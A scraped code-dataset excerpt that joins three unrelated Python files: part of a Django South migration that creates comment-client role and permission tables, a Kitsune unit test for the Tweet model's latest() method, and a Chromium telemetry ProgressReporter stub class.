# Adding M2M table for field roles on 'Permission'
db.create_table('django_comment_client_permission_roles', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('permission', models.ForeignKey(orm['django_comment_client.permission'], null=False)),
('role', models.ForeignKey(orm['django_comment_client.role'], null=False))
))
db.create_unique('django_comment_client_permission_roles', ['permission_id', 'role_id'])
def backwards(self, orm):
# Deleting model 'Role'
db.delete_table('django_comment_client_role')
# Removing M2M table for field users on 'Role'
db.delete_table('django_comment_client_role_users')
# Deleting model 'Permission'
db.delete_table('django_comment_client_permission')
# Removing M2M table for field roles on 'Permission'
db.delete_table('django_comment_client_permission_roles')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'django_comment_client.permission': {
'Meta': {'object_name': 'Permission'},
'name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'primary_key': 'True'}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'permissions'", 'symmetrical': 'False', 'to': "orm['django_comment_client.Role']"})
},
'django_comment_client.role': {
'Meta': {'object_name': 'Role'},
'course_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'roles'", 'symmetrical': 'False', 'to': "orm['auth.User']"})
}
}
complete_apps = ['django_comment_client']
|
feer56/Kitsune2 | refs/heads/master | kitsune/customercare/tests/test_models.py | 17 | from nose.tools import eq_, raises
from kitsune.customercare.models import Tweet
from kitsune.customercare.tests import tweet
from kitsune.sumo.tests import TestCase
class TweetTests(TestCase):
"""Tests for the Tweet model"""
def test_latest(self):
"""Test the latest() class method when there is a latest tweet."""
NUM = 2
for x in xrange(NUM):
last = tweet(save=True)
eq_(last.tweet_id, Tweet.latest().tweet_id)
@raises(Tweet.DoesNotExist)
def test_latest_does_not_exist(self):
"""latest() should throw DoesNotExist when there are no tweets."""
Tweet.latest()
|
sahiljain/catapult | refs/heads/master | telemetry/telemetry/internal/results/progress_reporter.py | 52 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class ProgressReporter(object):
"""A class that reports progress of a benchmark.
The reporter produces output whenever a significant event happens
during the progress of a benchmark, including (but not limited to):
when a page run is started, when a page run finished, any failures
during a page run.
The default implementation outputs nothing.
"""
def DidAddValue(self, value):
pass
def WillRunPage(self, page_test_results):
pass
def DidRunPage(self, page_test_results):
pass
def DidFinishAllTests(self, page_test_results):
pass
|
Subsets and Splits